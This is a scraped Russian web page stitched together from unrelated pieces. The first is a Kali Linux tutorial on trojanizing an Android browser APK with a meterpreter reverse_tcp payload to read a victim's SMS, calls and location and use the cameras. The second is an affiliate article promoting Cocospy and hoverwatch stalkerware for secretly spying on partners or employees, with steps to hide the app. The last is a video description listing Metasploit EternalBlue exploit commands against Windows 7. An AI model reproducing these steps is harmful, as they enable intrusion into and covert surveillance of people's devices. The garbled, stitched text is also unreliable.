Как взломать телефон через комп

Как взломать смартфон?

В статье описывается процесс, с помощью которого хакер может взломать смартфон жертвы, используя набор простых инструментов операционной системы Кали Линукс. И сегодня разберём один из способов того, как злоумышленник может взломать смартфон, находящийся под управлением операционной системы Андроид. Причём благодаря автоматизации некоторых процессов и при должной сноровке этот процесс можно поставить прямо-таки на поток.

Как взломать смартфон: лаборатория хакера.

  • Компьютер под управлением Кали Линукс Rolling
  • Смартфон под управлением Андроид
  • Невнимательный пользователь

Что хакер сможет сделать?

С помощью этого способа злоумышленник получит возможность:

  • читать смс
  • номера набранных телефонов
  • включать камеры устройства и просматривать видео в режиме он-лайн
  • определять текущее местоположение с большой точностью (в случае, если жертва использует Wi-Fi для выхода в сеть)
  • управлять устройством с помощью shell-команд (копировать, создавать и удалять файлы)

Как взломать смартфон: этапы взлома

Весь процесс разбивается на несколько этапов:

  • выбор оригинального приложения-жертвы
  • генерация пэйлоуда – декомпиляция двух файлов (созданного пэйлоуда и оригинального приложения .apk) – инжектирование файлов пэйлоуда в приложение – инжектирование специальных возможностей пэйлоуда и необходимых для этого разрешений для полноценной работы метерпретера
  • размещение заражённого приложения и удалённая с ним работа

Как видите самый смак лежит во втором, самом объёмном пункте. Дело в том, что всё описанное в нём можно проделать с помощью инструментария Метасплойт единственной командой через msfvenom, а можно – вручную. Она – команда – появится чуть ниже, а пока детали подготовки и объяснение флагов.

Выбираем приложение.

Перед тем, как начать, хакеру необходимо определиться с искомым приложением, которое он будет заражать для последующей «раздачи». Дело здесь не столько в популярности выбираемого, сколько в УЖЕ ИМЕЮЩИХСЯ возможностях и разрешениях этой программы. Давая разрешение на установку программы на свой смартфон, пользователи всё чаще обращают внимание именно на действия, которые приложение будет осуществлять. Согласитесь, если программки для игры в шахматы или читалка кодов ошибок автомобилей будет иметь доступ к настройкам звонков и СМС, а также к камере смартфона, это насторожит любого внимательного пользователя.

Однако такое поведение очень даже характерно для другого рода утилит, в том числе системных. Речь идёт о всякого рода чистильщиках, ремонтных утилитах и, конечно, мобильных браузерах и мессенджерах. Скорее всего, хакер обратит свой взор именно в эту степь. Я для примера возьму набирающий популярность мобильный браузер Mercury (у него есть дурацкая особенность – он сидит в автозагрузке и запускается вместе с включением устройства, а хакеру это только на руку), предварительно скачав его apk модуль установщика. Он называется ilegendsoft.mercury.apk.

Как взломать смартфон: генерация пэйлоуда.

Главная команда, которая и создаст троянский код:

-a dalvik — platform android – целью является платформа Андроид c архитектурой dalvik

Тип пэйлоуда. Обычно подбирается один из трёх типов пэйлоуда, которые по своему функционалу, в принципе, схожи. И все они входят в состав инструментария метерпретер из набора Метасплойт. Единственное их отличие — способ соединения с системой хакера. И выбирать будем из маленького списка:

  • reverse_tcp
  • reverse_https
  • reverse_http
Читайте также:  Восстановление поврежденного хранилища компонентов windows 10

IP адрес хакера. Если выбудете тренироваться на виртуальных площадках лаборатории, то есть смысл указать в качестве адреса локальный IP. У меня в статье будут фигурировать оба: локальный и глобальный адреса, так что вам лишь стоит набрать в Google команду what is my ip. IP адрес в локальной сети вам подскажет команда ifconfig. Оба адреса нам понадобятся, советую с этим моментом сразу определиться.

Порт. Выбираем любой, кроме реверсивных (80, например, не прокатит). Для работы в глобальной сети сразу необходимо позаботиться о пробросе портов. В статье о настройке троянской программы Dark Comet я пробросил с этой целью 1555 порт. Им и воспользуюсь в обоих экспериментах. Далее, настраиваем связку роутер – компьютер в опциях dst-nat (в разделе Переадресация портов в службе HTTP добавьте локальный адрес компьютера (из ответа на команду ifconfig в терминале Кали) в формате 192.168.Х.Х – всё зависит от версии вашего роутера):

IP-роутера:1555 -> 192.168.Х.Х:1555

Донор. Как уже указал, это браузер Меркурий (Mercury) ilegendsoft.mercury.apk.

Заражённый. В качестве имени будет фигурировать именно то имя, которое жертве будет подсовываться в качестве реального. Так что вопрос с наименованием также следует продумать заранее. У меня он называется payload.apk.

Далее. В Кали Линукс для работы нам не хватает одной маленькой библиотечки. Её и скачаем:

Итак, команда создания троянского приложения в моём случае принимает вид, в котором я и запускаю в терминале из директории с оригинальным apk:

Готово. Результат вы можете увидеть в той же папке:

Чтобы приложение смогло установиться и запуститься, нам нужно задать ему подпись. И сначала сгенерируем хранилище ключей:

Сейчас нам придётся пройти рутиную процедуру по регистрации. Пишите, впрочем, что хотите:

сверху рисунка попались результаты работы пэйлоуда – будущему браузеру присваивались неограниченные права

А теперь и сама подпись (работаем всё в той же папке, применявшиеся ранее имена папок и фалов я выделил жирным):

Подпись присваивается по умолчанию сроком на 10000 дней. Хватит. Тем временем в рабочей папке появился готовый к отсылке файл. Теперь заражённое приложение (кроме имени и чуть пополневшее – ничем от оригинала не отличается) должно оказаться на смартфоне жертвы и установиться.

Как взломать смартфон: работа с троянским приложением.

Антивирус при установке молчит. Установка проходит незаметно, кроме, конечно, предупреждений о непонятно откуда взявшихся непомерных желаниях браузера. Жертва включает браузер и лезет в сеть.

В это время злоумышленник ждёт урожая. Заряжаем Метасплойт (порты в роутере проброшены?):

нажмите, чтобы увеличить

Запущена текущая сессия метерпретера. Теперь остаётся вспомнить или изучить основные команды метера и команды shell под Андроид. Что-то можно выудить прямо сейчас. Наберите в строке метерпретера:

и вы увидите быстрые команды. Что здесь есть:

Что хоть взломали-то такое:

Проверим список sms-сок:

Проверим список звонков ( на выходе вы увидите путь calllog_dump_20170531121133.txt – документ в папке root):

Телефонные номера в книжке:

Логи будут представлены в виде текстовых файлов:

Рутирован ли смартфон:

Сколько есть камер:

Фото на память (камеры можно выбирать):

Запишем видео на память:

На некоторых смартфонах пэйлоуд сам активирует геолокацию, у некоторых пользователей она всегда включена. Проверьте, где он сейчас находится – повезёт-не повезёт (один из моих заражённых смартфонов, работающих через Wi-Fi, определился с точностью до адреса дома):

Наконец, для управления смартфоном наберём:

Есть доступ к командной строке Андроида.

Превентивные меры или как не попасться на удочку.

Из написанного понятны слабые места для тех, кто захочет вас отработать.

Как взломать телефон через компьютер за 3 минуты? Зачем? На это можно привести много причин.

  • Предположим, ваш телефон потерялся, вы в «печальке», а под рукой только компьютер. Ну и…подбираем подходящего шпиона, отслеживаем местоположение “потеряшки” и удаленно контролируем его.
  • Или вы волнующийся за своего ребенка родитель. Мониторинг их устройств позволит вам быть в курсе того, чем они заняты, какие у них интересы.
  • Либо вы один из супругов, который подозревает свою половину в измене. Тут вам и шпион в руки: внедряйтесь в его/ее телефон и ищите «компромат».
  • А может вы, как добропорядочный хаке…упс, работодатель хотите проконтролировать своего работника?
Читайте также:  Витая пара в чем суть

В общем, причины могут быть разные, а решать их можно…взломав целевое устройство. Удаленно. Бесплатно.

Как водится, способы могут быть хорошие и не очень. Именно вам может не повезти приобрести контрафактное ПО.

В этой статье мы раскроем вам способ, как взломать телефон через компьютер, воспользовавшись правильным, надежным и безопасным шпионским приложением.

1. Как взломать телефон, имея под рукой компьютер и… Cocospy?

Table of Contents

Cocospy– лучший инструмент, позволяющий взломать телефон через компьютер. На “шпионском” рынке приложение появилось относительно недавно, но уже громко заявило и показало себя.

Будучи абсолютно легальным ПО, Cocospy сделал все, чтобы завоевать доверие миллионов пользователей по всему миру.

Одна из вкусных особенностей Cocospy – это возможность проникнуть в чужое устройство без root-прав, что вдвойне ценно. Ведь сама процедура проведения рутинга/джейлбрейка делает телефон уязвимым к хакерам и вредоносному ПО.

Если у вас имеются “явки и пароли” от пользовательского iCloud, то проникнуть в целевой телефон можно удаленно. А если это Android, то вам нужно лишь установить Cocospy на него и… начинать пожинать плоды шпионской деятельности.

А как внедриться в iPhone? Подробнее об этом вы узнаете, изучив пошаговую инструкцию для взлома чужого iPhone здесь >>

Подобно настоящему профи, Cocospy умеет мастерски конспирироваться. Уже сразу после установки на целевом устройстве он переходит в режим “невидимки”, ведет себя тихо, даже энергию не тянет из телефона.

Перед тем, как идти в дело с Cocospy, устройте тест-драйв, воспользовавшись бесплатной онлайн демо-версией здесь.

Главные фишки Cocospy

Cocospy обладает расширенным набором функций, позволяющих шпионить в целевом устройстве через компьютер.

Давайте огласим список наиболее крутых из них:

  1. Geo-fencing: С ее помощью осуществляется настройка «безопасной» и «опасной» зон. Когда телефон входит или выходит из одной из этих областей, вы сразу же получаете уведомление. Плюс, вы можете ознакомиться с историей и маршрутом перемещений.
  2. Кейлоггер: Ведет журнал нажатых клавиш, позволяя взять “тепленькими” все пароли целевого пользователя. Как результат, вы получаете доступ ко всем аккаунтам соцсетей, электронной почте, да и ко всему остальному.Инструкция по взлому чужого телефона с компьютера через Cocospy

    Шпионить с Cocospy проще простого. Для этого вам нужно:

    1. Зарегистрироваться для доступа к Cocospy.

    2. Взломать iPhone без проведения джейлбрейка: В поля для заполнения введите пароль и логин пользовательского iCloud.

    3. Взломать Android без рутирования: Загрузите Cocospy и установите на целевой телефон. После завершения инсталляции скройте значок приложения.

    4. Переходим на панель управления Cocospy и проникаем в целевой телефон, используя компьютер.

    Все познается в сравнении. Теперь, когда мы знаем, как работает Cocospy, время испытать альтернативные варианты.

    Бесплатно зарегистрироваться для Cocospy или попробовать онлайн демо-версию здесь >>

    2. Как взломать телефон через компьютер с помощью hoverwatch?

    hoverwatch– один из доступных по цене вариантов для мониторинга целевого устройства с компьютера. Более того, с этим шпионом можно контролировать до 5 телефонов одновременно.

    Именно эта “изюминка” делает hoverwatch идеальным вариантом для многодетных родителей и для работодателей, имеющих много работников.

    Но в каждой бочке меда есть ложка дегтя. В случае с hoverwatch загвоздка в том, что приложение не дружит с iPhone. hoverwatch совместим только с Android, Windows и macOS. Поэтому с компьютера вы можете “достать” только Android.

    Читайте также:  Задачи на механику 9 класс

    Перед покупкой hoverwatch, вы можете устроить тест-драйв, воспользовавшись бесплатной 3-дневной пробной версией.

    Требуются ли hoverwatch root-права?

    hoverwatch работает как с root-правами, так и без них. Как бы то ни было, рутирование – это палка о двух концах.

    С одной стороны, если его провести, то у вас появится доступ к расширенным функциям: удаленному снятию скриншотов в целевом телефоне или мониторингу мессенджеров, таких как Snapchat, WhatsApp и Facebook Messenger.

    С другой стороны, это все равно что лишить устройство иммунитета. Любой чих хакера, вирус, вредоносное ПО – целевой Android будет уязвим перед всем этим.

    Но есть и хорошие новости. Даже без проведения рутинга целевого телефона, у вас будет доступ к некоторым крутым опциям:

    • Запись входящих/исходящих вызовов, чтобы прослушать их позже.
    • Доступ к журналу звонков. С его помощью вы сможете узнать, с кем говорили, когда и как долго.
    • Трекинг местоположения целевого телефона на основе данных GPS, а также просмотр истории и маршрута перемещений.
    • Доступ к истории интернет браузера и списку контактов.
    • Скрытая фотосъемка передней или задней камерой целевого телефона. Так вы будете знать, где объект слежки и чем он занят.
    • Получение уведомлений в случае, если целевой пользователь попытается поменять SIM-карту.

    Независимо от того, будете ли вы проводить рутинг или не будете, hoverwatch в любом случае требуется физический доступ к контролируемому устройству.

    После инсталляции приложения вы можете запустить режим “невидимки” и удалить иконку hoverwatch.

    Как взломать чужой телефон через компьютер, используя hoverwatch?

    1. Создайте учетную запись hoverwatch.
    2. Войдите в систему целевого телефона, чтобы включить опцию “Неизвестные источники”. Выберите путь: “Настройки” > “Безопасность”> “Неизвестные источники”.
    3. Перейдите на сайт hoverwatch с целевого телефона и авторизуйтесь.
    4. Загрузите hoverwatch на контролируемое устройство.
    5. Установите hoverwatch на целевой телефон и выберите того, кого будете контролировать: “ребенка”, “работника”, “себя” или “другое”. Сделали? Теперь жмите на “удалить значок hoverwatch”.

    Заключение

    Итак, что еще полезного мы извлекли из этой статьи, или, если быть точнее, чем закончилась битва титанов? Лично я считаю, что лидирует с большим отрывом Cocospy.

    Он намного эффективнее и надежнее, совместим с устройствами и iPhone, и Android, в то время как hoverwatch может шпионить только на Android.

    В то же время, если вам нужна более дешевая альтернатива или требуется мониторинг до 5 целевых устройств одновременно, то hoverwatch – идеальный вариант.

    Как бы то ни было, победителя выбираете вы и мы будем рады, если вы напишите нам об этом. Напоминаем, комментарии можно оставлять ниже.

    Очередь просмотра

    Очередь

    • Удалить все
    • Отключить

    YouTube Premium

    Хотите сохраните это видео?

    • Пожаловаться

    Пожаловаться на видео?

    Выполните вход, чтобы сообщить о неприемлемом контенте.

    Понравилось?

    Не понравилось?

    ВЫ МОЖЕТЕ С Помощью ЭТОГО ВИДЕО ПРОВЕРИТЬ СОЮ ЛОКАЛЬНУЮ СЕТЬ НА УЯЗВИМОСТЬ. НЕ В КОЕМ СЛУЧАЕ НЕ ИСПОЛЬЗУЙТЕ ЭТУ ИНФОРМАЦИЮ ВО ВРЕД! Я ВАС НИ К ЧЕМУ НЕ ПОБУЖДАЮ! ЭТО УГОЛОВНО НАКАЗУЕМО! НЕ ПОВТОРЯЙТЕ УВИДЕННОЕ!
    Тайм коды:
    Рассказ 0:19
    Установка 0:42
    Установка эксплойта 2:15
    Взлом 4:56

    В этом видео я расскажу вам как взломать компьютер под управлением Windows 7 в локальной сети. Мы будем взмывать с компьютер с приложения Termux по средствам Reverse Tcp.

    cd metasploit-framework
    ./msfconsole
    use exploit/windows/smb/ms17_010_eternalblue

    set process inject lsass.exe или wlms.exe
    set target architecture x64 или x32
    set payload windows/x64/meterpreter/reverse_tcp
    set rhost 192.168.
    set lhost 192.168.

    Music :
    Around One – Petar Dundov (Ideas From The Pond)
    Branches – BONES
    Intriguing Possibilities – Trent Reznor and Atticus Ross (The Social Network Soundtrack)

Ссылка на основную публикацию
Adblock detector